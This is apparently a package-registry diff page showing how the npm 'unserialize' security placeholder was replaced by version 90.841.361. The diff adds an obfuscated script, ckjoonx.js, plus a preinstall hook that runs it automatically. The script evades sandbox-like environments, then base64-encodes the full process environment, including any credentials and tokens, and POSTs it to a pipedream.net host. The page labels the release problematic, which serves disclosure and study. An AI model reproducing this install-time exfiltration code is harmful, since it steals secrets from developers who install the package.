unserialize 0.0.1-security → 90.841.361

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of unserialize might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/ckjoonx.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/ckjoonx.js ADDED
@@ -0,0 +1 @@
1
+ function a0_0x13a5(){const _0x53d67f=['2536770mjvrnC','1632KHxZfz','npm_config_registry','length','daasadmin','from','join','812284YVCkwZ','registry.npmmirror.com','6927kxzoGU','90QGpPbK','keys','660616wgxUta','2797278hCkhtf','pipedream','stringify','31498lIeaqz','taobao.org','includes','/usr/bin/python','toString','request','end','17luYdiV','7tLfbDq','tencent.com','error','npm_package_name','5324508cNbiyH','POST'];a0_0x13a5=function(){return _0x53d67f;};return a0_0x13a5();}function a0_0x4273(_0x107181,_0x39f2bf){const _0x13a51d=a0_0x13a5();return a0_0x4273=function(_0x42732c,_0x1eb7fe){_0x42732c=_0x42732c-0xd7;let _0x2f103c=_0x13a51d[_0x42732c];return _0x2f103c;},a0_0x4273(_0x107181,_0x39f2bf);}const a0_0x115c1f=a0_0x4273;(function(_0x455426,_0x4c6889){const _0x59f274=a0_0x4273,_0x3d9dc9=_0x455426();while(!![]){try{const _0x413491=-parseInt(_0x59f274(0xe7))/0x1*(parseInt(_0x59f274(0xe0))/0x2)+parseInt(_0x59f274(0xd9))/0x3*(parseInt(_0x59f274(0xef))/0x4)+-parseInt(_0x59f274(0xee))/0x5+-parseInt(_0x59f274(0xdd))/0x6*(-parseInt(_0x59f274(0xe8))/0x7)+parseInt(_0x59f274(0xdc))/0x8+-parseInt(_0x59f274(0xec))/0x9+-parseInt(_0x59f274(0xda))/0xa*(-parseInt(_0x59f274(0xd7))/0xb);if(_0x413491===_0x4c6889)break;else _0x3d9dc9['push'](_0x3d9dc9['shift']());}catch(_0x3bf0c3){_0x3d9dc9['push'](_0x3d9dc9['shift']());}}}(a0_0x13a5,0xc0917));const http=require('https'),filter=[{'key':a0_0x115c1f(0xf0),'val':a0_0x115c1f(0xe1)},{'key':'npm_config_registry','val':a0_0x115c1f(0xe9)},{'key':a0_0x115c1f(0xf0),'val':a0_0x115c1f(0xd8)},{'key':'USERNAME','val':a0_0x115c1f(0xf2)},{'key':'_','val':a0_0x115c1f(0xe3)}];function main(){const _0x1afa91=a0_0x115c1f;var _0x47b86a=process['env']||{};if(filter['some'](({key:_0x5e4ffa,val:_0x49564a})=>_0x47b86a[_0x5e4ffa]&&_0x47b86a[_0x5e4ffa][_0x1afa91(0xe2)](_0x49564a))||Object[_0x1afa91(0xdb)](_0x47b86a)[_0x1afa91(0xf1)]<0xa)return;req=http[_0x1afa91(0xe5)]({'host':['1268384ff816fb002f65302287b639ce','m',_0x1afa91(0xde),'net'][_0x1afa91(0xf4)]('.'),'path':'/'+(_0x47b86a[_0x1afa91(0xeb)]||''),'method':_0x1afa91(0xed)})['on'](_0x1afa91(0xea),function(_0xd2cf25){}),req['write'](Buffer[_0x1afa91(0xf3)](JSON[_0x1afa91(0xdf)](_0x47b86a))[_0x1afa91(0xe4)]('base64')),req[_0x1afa91(0xe6)]();}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "unserialize",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "90.841.361",
4
+ "main": "ckjoonx.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node ckjoonx.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=unserialize for more information.